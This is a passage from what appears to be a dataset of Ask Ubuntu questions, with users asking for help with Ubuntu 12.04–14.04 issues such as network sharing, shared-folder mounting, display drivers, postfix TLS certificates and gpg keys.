id_pci_class_from_database=serial bus controller id_pci_interface_from_database=xhci id_pci_subclass_from_database=usb controller id_vendor_from_database=nec corporation modalias=pci : v00001033d00000194sv0000ffffsd0000ffffbc0csc03i30 pci_class=c0330 pci_id=1033:0194 pci_slot_name=0000:03:00.0 pci_subsys_id=ffff : ffff seqnum=1666 subsystem=pci usec_initialized=85 messages with card hot-plugged : lspci : nothing found /var/log/dmesg : nothing found dmesg command : [ 31.456256 ] acpi : \_sb_.pci0 : bus check notify on hotplug_event_root /var/log/kern.log : nothing found /var/log/sys.log : nothing found /var/log/udev : nothing found dmesg command after unplug : [ 719.603717 ] acpi : \_sb_.pci0 : bus check notify on hotplug_event_root compared the loaded modules on lsmod for both cases : no difference found when the card was plugged at boot time it appears on lspci . when i unplug it then , it is still there !
481551	ubuntu server 14.04 share internet from eth0 to eth1 with commandline	i have installed ubuntu server 14.04 lamp with two network adapters and i 'm attempting to share the network from eth0 ( wan ) to eth1 ( lan ) . the reason for doing this is that the ubuntu server works as a nas for my raspberry pi ( rpi ) ( configured with openelec ) . the rpi is connected with cable to eth1 . here is the guide that have helped me so far . https : //help.ubuntu.com/community/internet/connectionsharing # gateway_set_up i have a almost clean installation of ubuntu server 14.04 and tried the `` advanced gateway configuration '' from the first guide above . the following works nas : 192.168.1.41 can access lan and internet rpi : 192.168.0.41 can only access nas **the problem that i 'm facing is that i can not get the connection from the server to be shared to the rpi . when i try to ping anything i get the following ( just another ip on the lan ) . ping test to lan computer : nas @ ubuntu : ~ $ ping 192.168.1.11 ping 192.168.1.11 ( 192.168.1.11 ) 56 ( 84 ) bytes of data . from 192.168.1.41 icmp_seq=1 destination host unreachable from 192.168.1.41 icmp_seq=2 destination host unreachable from 192.168.1.41 icmp_seq=3 destination host unreachable can anyone help me configure eth0 to share network with eth1 ? i have been trying for weeks now and have no clue what is stopping me . thanks in advance . this is what i get with `` ip addr '' 1 : lo : < loopback , up , lower_up > mtu 65536 qdisc noqueue state unknown group default link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up group default qlen 1000 link/ether 00:15:5d:01 : c9:03 brd ff : ff : ff : ff : ff : ff inet 192.168.1.41/24 brd 192.168.1.255 scope global eth0 valid_lft forever preferred_lft forever inet6 fe80 : :215:5dff : fe01 : c903/64 scope link valid_lft forever preferred_lft forever 3 : eth1 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up group default qlen 1000 link/ether 00:15:5d:01 : c9:05 brd ff : ff : ff : ff : ff : ff inet 192.168.0.41/24 brd 192.168.10.255 scope global eth1 valid_lft forever preferred_lft forever inet6 fe80 : :215:5dff : fe01 : c905/64 scope link valid_lft forever preferred_lft forever ifconfig eth0 link encap : ethernet hwaddr 00:15:5d:01 : c9:03 inet addr:192.168.1.41 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :215:5dff : fe01 : c903/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1591 errors:0 dropped:0 overruns:0 frame:0 tx packets:910 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:697861 ( 697.8 kb ) tx bytes:195228 ( 195.2 kb ) eth1 link encap : ethernet hwaddr 00:15:5d:01 : c9:05 inet addr:192.168.0.41 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :215:5dff : fe01 : c905/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:155 errors:0 dropped:0 overruns:0 frame:0 tx packets:8 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:27981 ( 27.9 kb ) tx bytes:648 ( 648.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:45 errors:0 dropped:0 overruns:0 frame:0 tx packets:45 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:3630 ( 3.6 kb ) tx bytes:3630 ( 3.6 kb ) updated on request : netstat -rn kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 192.168.0.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 iptables -l chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination accept all -- 192.168.0.0/24 anywhere ctstate new accept all -- anywhere anywhere ctstate related , established chain output ( policy accept ) target prot opt source destination
481552	mount : mounting /dev/disk/by-uuid	long story short , i got a computer a while ago , my friend put ubuntu ( 12.04 lts ) on it . it does't have a disk drive so a lot of the other forums did n't really help me . i recently got a message appearing on my screen saying ; mount : mounting /dev/disk/by-uuid/72ff2ac7-7a7f-4286-9f1b-e729ead5e8df then some other stuff . i can list it if needed , but that was on the first line . it wo n't load anything else . i have n't really used ubuntu so i 'm not familiar with it . any help on what to do would be nice
481557	intelligently autohide the launcher in ubuntu 14.04	according to this answer , it is possible to configure the launcher to : dodge windows - the launcher will hide when a window would overlay it . dodge active window - the launcher will hide only when an active window would overlay it . however , these two options are missing both from unity tweak tool and compizconfig settings manager . the only two options included now for hide launcher are never and autohide . what can i do to get to get these settings back ?
481558	possible to download paid game a second time for free from software center ?	i 've paid for steel storm some time ago and i 'd like to play it again but if i click the option to get previous purchases nothing happens and if i try to purchase the game again to see if my previous purchase is remembered that does n't happen either after logging in . i 'm on xubuntu 14.04 64bit .
481559	how to automatically mount a folder and change ownership from root in virtualbox	it is my first time using virtualbox and ubuntu ( 14.04 ) , i am on a host windows 7 os . i am trying to mount a shared folder that has files i need to access both in the virtualbox and on the windows os . i have successfully mounted them using the vboxsf from the guest additions installed . to mount i used the command sudo mount -t vboxsf < dir name in vbox > < directory in linux for example i used sudo mount -t vboxsf test /home/user/test i found several ways of mounting the directories automatically upon startup using for example the /etc/rc.local method ( here ) where you modify said file appending the command to it ( without sudo ) . or by using the fstab method ( here ) . i prefer the rc.local method personally . once mounted it has permissions dr-xr-xr-x however once mounted the directory is of root ownership and chown user /home/user/test has no effect . this means i can not make or change files in it as a normal user . in the virtualbox the directory to be shared is not set as read-only . is there a way to automatically mount the shared folder and assign ownership to my non root user ?
481561	how to renable ânever showâ notifications in xubuntu 14.04 ?	dear beloved community ! i accidentally disabled some applications from the notifications bubble . i was wondering , how can i renable the hidden applications again ? i found a few answers on askubuntu and the ubuntu forums , but unfortunately the information no longer corresponds properly to the actual file system ( e.g : dconf-editor - > apps - > nm-applet - > `` disable-connected-notifications '' and `` disable-disconnected-notifications '' are disabled `` unchecked '' , does no longer apply , i ca n't see anything in there except stamp = value 3 ) . any help would be greatly appreciated ! have a nice day !
481566	sound issues with xubuntu 12.04 and alc888 soundcard	i have alc888 soundcard in my computer that has 6 outputs in the back . i made sure that nothing was muted in alsamixer . i can only produce some sound through one of the 6 if i have `` front mic '' turned up in alsamixer , however the sound is crackly and cuts in and out . i 'm extremely frustrated and i have no idea where to begin . can anyone please help me ?
481570	default-display-manager error	i was using gnome desktop manager , then i changed the file ./etc/x11/default-display-manager to nothing , so the login would be made via command line . the problem is that there 's a file created in the same folder with the name default-display-manager~ but when i boot the pc gdm starts to load and never finishes . i tried to acess the shell via recovery mode but i 'm not able to modify files . please assist , i 'm in chaos !
481571	ubuntu failing to boot - could not write bytes : broken pipe	so i was having a problem with steam and i went to the steam support center and it told me to delete a file ( within the steam directory ) next step after that , reboot when i do i am greeted with a black screen saying `` could not write bytes : broken pipe . '' i have googled this and have tried everything but nothing is working so if anyone knows a solution i would be very grateful
481572	where to find actual commands for nautilus `` open with '' options ?	actually i want to mount an iso image ( command line ) without creating and specifying paths for mount command ( just to point to iso and have it mounted ) . so if `` disk image mounter '' is a script - where is it ? and in general where to find actual commands for `` open with '' options in nautilus right click menu ? ubuntu 14.04
481574	changing application icon that appears in the top bar	i 'm not talking about the actual theme icons , but i would like to be able to replace a couple of application icons that appear in my topbar . specifically the 'worksnaps ' icon , which sucks as it is ( the blue 'w ' ) : the app directory doesnât seem to contain any icons and i 'm not sure where to start looking . any pointers would be appreciated . i would also like to change my skype icon to be monochrome ( not in pic ) , but i 'm taking it one step at a time .
481576	resolution : only 640 x 480 possible	i 'm new to ubuntu and i ca n't get the right resolution : the only one i can choose in `` monitor settings '' ( i 'm running lubuntu 14.04 because the laptop is too slow for ubuntu ) is 640 x 480 ( with a refresh rate of 73 hz ) . on windows xp i had 1280 x 800 ( at 60 hz ) and - that 's the strange part - when i was booting the test version with an usb stick i could choose between 640 x 480 and 1024 x768 ! does anyone have an idea what might have happened ? the laptop is an esprimo mobile v5535 with a sis 672 graphic card . i 've already found out that this graphic card makes some trouble and that there is no supported driver ( i 've already checked the `` additional drivers '' ) . what i have tried out so far : using xrandr ( cvt -- > newmode -- > addmode -- > output ) , following i.e . this link . i do create a new mode but the resolution does n't change when i try to apply it . here is what xrandr says : xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 640 x 480 , maximum 640 x 480 default connected 640x480+0+0 0mm x 0mm 640x480 73.0* as it also says `` maximum 640 x 480 '' , i tried to increase the virtual screen following this ( at one point - i do n't remember when - i got this `` screen can not be larger than 640 x 480 '' -message ) . this only led to a black screen and i had to reactivate the backup of xorg.conf . since at the beginning i did n't have any xorg.conf-file , i created a new file which i simply named xorg.conf containing the following : section `` device '' identifier `` configured video device '' endsection section `` monitor '' identifier `` configured monitor '' horizsync 30.0-62.0 vertrefresh 50.0-70.0 endsection section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` configured video device '' defaultdepth 24 subsection `` display '' depth 24 modes `` 1024x768 '' `` 800x600 '' endsubsection endsection i then moved it to /etc/x11 because i read this in a website ( to which i do n't remember the link ) . do n't know whether this is how to do it ( xorg -- configure did n't work -- > i only got the message that this option does n't exist ) . i really do n't know how to manage the problem and i would be glad if someone could help me . and i find it very irritating that everything was ok in the test version ! edit : i solved the problem by installing linux mint 13 ( ! ) instead of ubuntu and it works with my graphic card . i still get only 1024 x 768 but it 's ok for what i have to do .
481583	for a custom 14.04 livecd , when and where to set org.gnome.desktop.media-handling automount-open false	i am using uck to create a locked down kiosk 14.04 live cd that can do vpn and rdp , but not access usb , floppy , hard disk , or any other storage but the cd it was booted from . if i issue in the uck console : gsettings set org.gnome.desktop.media-handling automount-open false will the livecd itself be unusable ? alternatively , is there a place where i can put the gsettings command in a script that will run after the livecd itself is mounted , but before the autologgedon non-admin user can do anything ?
481585	change unity for gnome-fallback	i am trying to set up a couple of computers with ubuntu 14.04 . when we had the computers running 12.04 we were able to get users to log in with gnome-session-fallback as a default . however , i am unable to do this with 14.04 . i have modified 50-ubuntu.conf and 50-unity-greeter.conf in the lightdm directory . i have modified the 10_ubuntu.gschema.override file so that the session says gnome-fallback . these still log people into unity unless they select gnome-fallback .
481587	add event on calendar	i click on add event on calendar on right upper of screen , but it does not do anything , do i need to do any configuration to add event using ubuntu 13.10 ? your information and help is great appreciated , regards , iccsi
481597	software center does n't work	i tried everything to make it work but could n't . here is the error : 2014-06-11 02:50:48,854 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2014-06-11 02:50:49,040 - softwarecenter.db.database - error - failed to add apt-xapian-index traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/database.py '' , line 194 , in _get_new_xapiandb softwarecenter.paths.apt_xapian_index_db_path ) file `` /usr/lib/python2.7/dist-packages/xapian/__init__.py '' , line 3667 , in __init__ _xapian.database_swiginit ( self , _xapian.new_database ( *args ) ) databaseopeningerror : could n't stat '/var/lib/apt-xapian-index/index ' ( no such file or directory ) 2014-06-11 02:50:54,014 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2014-06-11 02:50:54,029 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software-center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2014-06-11 02:50:54,072 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2014-06-11 02:50:54,072 - root - error - could not find any typelib for launchpadintegration 2014-06-11 02:50:54,283 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) 2014-06-11 02:50:55,625 - softwarecenter.backend.reviews - warning - error creating bsddb : ' ( 22 , 'invalid argument -- bdb0054 illegal flag combination specified to db_env- > open ' ) ' ( corrupted ? ) 2014-06-11 02:50:55,642 - softwarecenter.backend.reviews - error - trying to repair db failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/backend/reviews/__init__.py '' , line 358 , in _save_review_stats_cache_blocking self._dump_bsddbm_for_unity ( outfile , outdir ) file `` /usr/share/software-center/softwarecenter/backend/reviews/__init__.py '' , line 377 , in _dump_bsddbm_for_unity 0600 ) dbinvalidargerror : ( 22 , 'invalid argument -- bdb0054 illegal flag combination specified to db_env- > open ' ) /usr/lib/python2.7/dist-packages/gi/overrides/glib.py:535 : warning : source id 74 was not found when attempting to remove it return super ( maincontext , self ) .iteration ( may_block ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 261 , in open self._cache = apt.cache ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 107 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 155 , in open self._list.read_main_list ( ) systemerror : e : malformed line 57 in source list /etc/apt/sources.list ( dist parse ) 2014-06-11 02:50:58,177 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 281 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 183 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1375 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1313 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 150 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 227 , in init_view self.cache , self.db , self.icons , self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 80 , in __init__ self.build ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 326 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 121 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 255 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 240 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 131 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 330 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 225 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 281 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__'
481606	boot loader error ubuntu 14.04	why do i get the message - `` boot loader /caspar/vmlinuz : file not found '' when launching virtualbox or when trying to boot from the usb key ?
481607	kubuntu 13.10 to 14.04 upgrade via iso	i ca n't upgrade through do-release-upgrade due to a slow internet connection , so i downloaded the iso file , and mounted it : sudo mount -o ro ~/kubuntu-14.04-desktop-amd64.iso /media/emcdrom it 's mounted , ok , but there is no any autorun or *.sh 's , so what i should do next ? p.s . i know , in old ( 10. , 11 . ) distributives it will be done by kdesudo `` sh /media/cdrom/cdromupgrade '' command , but , like i already said - there is no cdromupgrade.sh or any other *.sh . only wubi.exe and grub boot core .
481611	how do i find a public key id in terminal ?	i added this key to my system : wget -q -o - https : //dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add - sudo sh -c 'echo `` deb http : //dl.google.com/linux/chrome/deb/ stable main '' > > /etc/apt/sources.list.d/google.list' but i did n't like it and tried to delete it manually and doing it wrong actually , so i got gpg key error no_pub_key ... after running apt-get update . i got a whole bunch of public keys so : i ran : apt-key list | grep google* but it shows me only google uid but no pub and i need pub to run apt-key del . so what do i need to add/edit to this command line apt-key list | grep google* so it search for google pub ?
481614	viber notification is not in the right position	this question is basically the same question as annoying viber notification , but the guy there did n't get any answer . so i am also posting it as i could n't find any answer anywhere . as you can see there is a very annoying icon of viber on the top left , that is on top of the exit symbol `` x '' of the other applications . is it possible to remove that thing completely , or to move it at the place where the skype or the dropbox is ? i have ubuntu 14.04 desktop edition installed .
481615	downloading bcm4321	i can not figure out how to download this driver so that i can connect to my wireless internet : it is the `` bcm4321 80211 linux sta driver . i sure could use some help . thank you very much ! wayne
481619	ubuntu one shutting down message	every time i boot my computer , i get the auto pop-up in the upper right notifying me that ubuntu one is closing june 1 , 2014 . i ca n't figure out how to get it to stop showing that message . i have disconnected all of my devices from ubuntu one , and clearly june 1 has already past , and i still get the pop-up . any advice ?
481625	apt-get upgrade e : sub-process /usr/bin/dpkg returned an error code ( 1 )	when i typed apt-get install upgrade , i got error : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up linux-netizen ( 1.0.1-1 ) ... chrome : no process found dpkg : error processing linux-netizen ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : linux-netizen e : sub-process /usr/bin/dpkg returned an error code ( 1 ) so i tried some method to fix it : sudo apt-get install -f and sudo apt-get install -- configure -a but all methods are not working . please help me ... .
481627	how to disable the auto resizing of windows when you touch the top or bottom	can someone tell me how to stop the autoresizing behavior of windows in ubuntu 14.04 when you touch the top or bottom when resizing the window . there is an undesirable effect of the the bottom resizing all the way to the bottom when you only want to resize the top , or vice-versa . in the past it was possible to disable this effect by unchecking grid in ccsm . then came unity tweak tool which made it easy to remove . you could remove it by turning off window snapping and hotcorners . now in ubuntu 14.04 i have all those feature turned off and yet i ca n't resize only the top or only the bottom without the other end automatically moving .
481630	what is git ( program that linus created )	this question might not be appropriate for this exact forum however i am sure that everyone here knows . i looked at multiple definitions and ca n't figure out exactly what it is . if anyone could explain what it is and where it 's used in simple terms that would be great , thanks in advance and sorry for posting in the wrong forum .
481631	hp bluetooth mouse connection problems	about a month ago , i turned on my laptop ( ubuntu 14.04 and windows 8.1 dual boot , though the mouse works fine in windows ) , logged in and connected my hp x4000b mouse via a bluetooth dongle ( kinivo btd-400 ) , and noticed that the battery indicator in ubuntu said that the mouse battery was at 0 % . the day before it was around 30 % , so i decided to just change the batteries in the mouse , but after reconnecting with the new batteries , it still said 0 % . the mouse connected and worked just fine , so i did n't think much of it . about a week after that , i noticed that my mouse would sometimes disconnect if i did n't use it , but since reconnecting is n't that hard i just decided to leave it . now it also wo n't reconnect unless i log out and back in again , which is getting sort of tedious . is there any way to fix this issue ? any help is appreciated , and i will try and respond to questions asap . thanks .
481637	why does my system use so much cache ?	previously , on my desktop computer running ubuntu 14.04 , i had 4gb ram , which i thought should be plenty . however , after being on for a while , my computer would seem to get slow . i have a system resource monitor app in my gnome panel , which i assume represents the available ram ( ? ) . it shows a dark green area as being `` memory '' , and a light green area as `` cache '' . the `` cache '' would slowly grow until it filled the whole graph , and then programs would get slow to load , or it would take a while to switch programs . i could alleviate the problem somewhat with this command , but eventually the computer cache fills up again , so it 's only a bandaid : sudo sh -c `` sync ; echo 3 > /proc/sys/vm/drop_caches '' so , i figured i 'd get more ram , so i replaced one 2gb stick with an 8gb stick , and now i have 10 gb ram . and my `` cache '' still slowly maxes out and my computer slows as a result . also , sometimes the computer starts out with `` cache '' maxed when i first boot and log in . not always though , i do n't know if there 's a pattern that determines why it happens . why is ubuntu using up so much cache ? is 10gb not enough for ubuntu ? here 's what my system monitor looks like in my gnome panel . the middle square shows ram usage . the light green area is the `` cache '' : this is my memory and swap history , which does n't seem to include any information about `` cache '' . i realize at this point i 'm not totally clear on the difference between `` cache '' and `` swap '' :
481638	moving from windows 8.1 to ubuntu - what can i do to replace onedrive ?	that 's it - i got tired from the constant problems on and about windows i 'm having . network issues , performance issues , compatibility issues ... but i 'll seriously miss onedrive integration ( all my files are there ) . there is some kind of app that can sync with it ? and what is the easiest way to install jdk ? through ppas ? note that i have no plans to keep windows , i 'll just replace the d*mn thing with ubuntu ( maybe mint ) .
481639	recent patch to 14.04lts messed up screen display ( ubuntu in vmware player )	ubuntu 14.04 lts under vmware player . was up to date on patches , few days ago ubuntu wanted more patches , i let it do it . after reboot , login works ok , then screen switches and displays three copies of itself , ie : [ sidebar display ] [ sidebar display ] [ sidebar display ] how to fix ?
481641	is there a flawless working antivirus program for ubuntu 14.04 ?	i tried to install clamav , avira , bitdefender and comodo to install on my ubuntu unity 14.04 os but couldnât able to success . all have a problem to resolve . is there a flawless program that workouts ? can anybody help in this regard ? thank you , regards , simko
481645	configuring network to set wlan0 as primary	i recently had to rebuild my pc and decided to go for ubuntu 14.04 . i think the mistake i made was i started from a 12.04 install disk instead of the 12.10 disk i 'd used previously and when given the option set my primary connection as ethernet ( because the wireless option did n't work ) . after upgrading to 14.04 etc , i managed to get the wireless working , or more using steps like ifconfig -a and the likes i managed to prove that the wireless card etc . is all installed and working . however every time i boot without a hard wired connection plugged in i get the message `` waiting for network configuration '' . i can then once it 's booted without a network get my wirless working using sudo ifconfig wlan0 up iwlist wlan0 scan this seems to kick the wireless module into life and it appears in the gui and i can then select a network , however all the options like edit network and disconnect etc are all greyed out . what i would like of course is if the wlan0 was just set as my primary default network so i 've been looking for a solution to this and it would seem that i need to adjust the old /etc/network/interfaces file but when i try to do so using the sudo vi /etc/network/interfaces command i , well i simply have no idea what i 'm doing . other than that typing : q ! gets me out of there before i do to much damage ! as far as i can tell ( by navigating to the file in the gui ) the output of my /etc/network/interfaces is as follows : ( obviously not including the `` in each line that 's just to break the heading rule of the # ) '' # this file describes the network interfaces available on your system `` # and how to activate them . for more information , see interfaces ( 5 ) . `` # the loopback network interface auto lo iface lo inet loopback '' # the primary network interface auto eth0 iface eth0 inet dhcp if this is the case then this clearly does n't contain what it should do but i do n't how to fix it . nor do i even know if i 'm on the right track . any help would be appreciated thanks : )
481647	some problem about compiz and gtk on ubuntu 14.04	i installed ubuntu 14.04 on my computer : i3/4g/750g/vga intel hd3000 & 1gb nvidia with cuda gt540m . i 've some problems with ubuntu 14.04 : does ubuntu 14.04 support emerald theme manager ? emerald theme manager is not available in ubuntu software center ? i installed compiz and compiz setting manager , it works ok , but the windows 3d plugin is not work ? the shutdown/restart function on right-top panel is not work , is there any solution for this problem ? the mouse theme i installed only work in current session , next time i restart computer it change back to default mouse theme ? how can i resize the spacing between desktop icon ? waiting for everyone respond . thankyou so much . p/s : my english is not good , expect you understand . : )
481650	postfix smtpd.key creation	the ubuntu documentation on postfix gives : generate certificates to be used for tls encryption and/or certificate authentication : touch smtpd.key chmod 600 smtpd.key openssl genrsa 1024 > smtpd.key openssl req -new -key smtpd.key -x509 -days 3650 -out smtpd.crt # has prompts openssl req -new -x509 -extensions v3_ca -keyout cakey.pem -out cacert.pem -days 3650 # has prompts sudo mv smtpd.key /etc/ssl/private/ sudo mv smtpd.crt /etc/ssl/certs/ sudo mv cakey.pem /etc/ssl/private/ sudo mv cacert.pem /etc/ssl/certs/ however , where does smtpd.key go ? where should these commands be issued , what is the path ? i 'm running the trusty mail-stack-delivery . also , on a side note , i can just put those commands into a text file , make it executable and run them as a script ? rather than type them in one by one ? ( if so , why is n't this scripted already ? )
481651	problems with ibus & ibus-hangul in kubuntu 14.04	i am relatively new to linux , but i have had ibus working with hangul ( korean ) input in the past with linux mint 16 & ubuntu 14.04 i have just installed kubuntu 14.04 but ca n't get ibus to run hangul properly . since installing , i now also have missing characters both in hangul & english inputs . both in terminal and gui , some prgrams simply show black or white squares where english or korean characters should be . i have tried removing ibus and reinstalling to no effect . im-config , in particular does not show characters properly , nor have i been able to us it ; it just seems to crash when i try to change the input method . dolphin is also messed up . unfortunately i ca n't upload pics yet ( due to reputation restriction ) . any help , please use laymen terms ! thanks : ) output from im-config -m ibus missing ibus output from env | grep im_ clutter_im_module=xim qt_im_module=xim im_config_phase=1 qt4_im_module=ibus gtk_im_module=xim
481652	chrome graphical glitches with amd catalyst proprietary driver	same exact issue as chrome display glitch when the gpu acceleration is on , amd catalyst driver but i do n't have enough reputation to comment . graphical glitching happens periodically , maybe triggered by flash/javascript-heavy pages ? i 'm pretty sure this started happening after chrome switched from gtk+ to aura . on amd radeon hd 6670 w/ catalyst 13.101-130523a-157671e-ati , ubuntu 12.04 w/ cinnamon
481656	postfix self-signed server certificate syntax ( versus snakeoil )	the postfix quick start guide on tls gives : self-signed server certificate the following commands ( credits : viktor dukhovni ) generate and install a private key and 10-year self-signed certificate for the local postfix system . this requires super-user privileges . # dir= '' $ ( postconf -h config_directory ) '' # fqdn= $ ( postconf -h myhostname ) # case $ fqdn in /* ) fqdn= $ ( cat `` $ fqdn '' ) ; ; esac # ymd= $ ( date + % y- % m- % d ) # key= '' $ { dir } /key- $ { ymd } .pem '' ; rm -f `` $ { key } '' # cert= '' $ { dir } /cert- $ { ymd } .pem '' ; rm -f `` $ { cert } '' # ( umask 077 ; openssl genrsa -out `` $ { key } '' 2048 ) & & openssl req -new -key `` $ { key } '' \ -x509 -subj `` /cn= $ { fqdn } '' -days 3650 -out `` $ { cert } '' & & postconf -e \ `` smtpd_tls_cert_file = $ { cert } '' \ `` smtpd_tls_key_file = $ { key } '' i 'm not sure where to issue these commands from ( yes , sudo from the terminal , of course ) . they can be issued from any path ? the commands are a bit over my head , but neither do i want to delve too deeply into their meaning . it 's a small script or program , creating variables like dir and fqdn which are then used later in the script ? i have some java , but can not quite follow these commands . however , could i just point postfix to the existing snakeoil certificates ? if it 's not possible , or advisable , to use the snakeoil certificates , why not ?
481657	compaq presario cq40 clean installation dev sda error	input/output error dev/sda/ on clean install ubuntu will not install either from usb or dvd cd computer store has confirmed hdd and optical drive intact and undamaged and all trouble shooting has failed
481658	no intel driver loading but intel driver installed no 3d effects vesa only works	i have asus laptop x55sx161d . when i try to install ubuntu 13.10 it automatically switch off . then i added nomodeset , i installed it but no unity 3d desktop . i checked it is not loading intel driver installed but using vesa only . i tried all methods almost by referring google but nothing works , it shows : opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.3 , 128 bits ) opengl version string : 2.1 mesa 9.2.1 opengl shading language version string : 1.30 opengl extensions : one more news when i added acpi=off , it loads intel but shutdown is problem hanging . my previous ubuntu 11.10 loaded intel driver with 3d effects with no problem but why latest ubuntu not loading my installed intel driver properly ? this is happing for debian 7 too , there no acpi=off also not loading intel installed driver with 3d effects . for mesa and all libraries , i installed and reinstalled packages and reconfigure also , but no use .
481659	nautilus consuming too much cpu for retrieving thumbnails for applications	some screen shots about the problem now i 'm killing the program . the output in terminal for nautilus is glib-gio-message : using the 'memory ' gsettings backend . your settings will not be saved or shared with other applications . initializing nautilus-gdu extension please help me . thanks you .
481660	terminal is not recognizing commands	like cd/documents gives `` cd/documents command not found `` .the same thing with sudo command . not able to access an files , change directories or install software
481663	how do i remove gpg private keys from memory ?	when i do the following : gpg -- decrypt somefile.pgp i see a graphical dialog come up asking me for the passphrase for my private gpg key . after that , subsequent runs do n't require a passphrase , as they seemingly use the gpg key from an in-memory gpg agent . how do i clear out all keys of that gpg agent ? i do n't like them hanging around in memory uselessly .
481664	sony btn200 bluetooth headphone on ubuntu 12.04 lts	i have a pair of sony btn200 bluetooth headphone that i would like to use on ubuntu 12.04 lts . unfortunately my laptop can not see them . bluetooth is on on both the laptop and the headphone of course , but the laptop simply can not see the headphone . i tried googling the issue but i could n't find anything . has anyone encountered any problem when connecting bluetooth headphones to ubuntu 12.04 lts ? if yes , how did you fix it ? thanks a lot
481667	window glitches for all application and windows exept web browser	i 'm having these window glitches often . what could it be related to ? the only way to get rid of it is to shut-down and reboot wich is annoying http : //s23.postimg.org/xdkr0wb63/screenshot_from_2014_06_11_01_35_55.png
481671	can not authorize ubuntu 14.04 to access my google account behind a proxy	i have to use a proxy in ubuntu 14.04 ( by setting it in network ) because google is banned here . we i add my google account to online accounts , the first two steps are ok ( sign in and accept ) , but after click accept , i get a black screen and stops there . how to handle this ?
